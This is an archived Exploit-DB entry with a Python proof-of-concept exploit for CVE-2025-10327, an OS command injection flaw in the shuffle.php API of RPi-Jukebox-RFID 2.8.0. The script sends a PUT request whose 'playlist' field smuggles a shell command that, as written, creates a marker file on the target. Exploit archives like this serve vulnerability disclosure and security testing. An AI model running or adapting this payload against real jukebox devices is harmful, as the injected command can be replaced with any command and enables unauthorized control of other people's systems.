← Back ⬡ Vulnerabilities & CVEs —

[webapps] RPi-Jukebox-RFID 2.8.0 - Remote Command Execution

Exploit DB Archived Mar 16, 2026 ✓ Full text saved

RPi-Jukebox-RFID 2.8.0 - Remote Command Execution

Full text archived locally

✦ AI Summary · Claude Sonnet

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING RPi-Jukebox-RFID 2.8.0 - Remote Command Execution EDB-ID: 52468 CVE: 2025-10327 EDB Verified: Author: BEATRIZ FRESNO NAUMOVA Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-01-17 Vulnerable App: # Exploit Title: RPi-Jukebox-RFID 2.8.0 - Remote Code Execution # Date: 2025-09-25 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID # Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0 # Version: 2.8.0 # Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0 # CVE: CVE-2025-10327 # # Description: # This PoC demonstrates an OS command injection vulnerability in the shuffle.php API endpoint. # The vulnerable parameter "playlist" is passed directly to a shell command without sanitization, # allowing an attacker to execute arbitrary system commands. import requests import json # Replace this with the actual target IP or hostname TARGET = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php" # Payload to inject – here we create a file as proof of execution INJECTED_COMMAND = "test';touch rced_by_xu17.txt;echo '" # JSON payload for the request payload = { "playlist": INJECTED_COMMAND, "shuffle": "true" } # HTTP headers headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } def exploit(): print("[+] Sending malicious JSON payload to trigger command injection...") try: response = requests.put(TARGET, headers=headers, data=json.dumps(payload), timeout=5) print(f"[+] HTTP Status Code: {response.status_code}") print("[*] If the target is vulnerable, the command should be executed on the server.") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": exploit() Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services

💬 Team Notes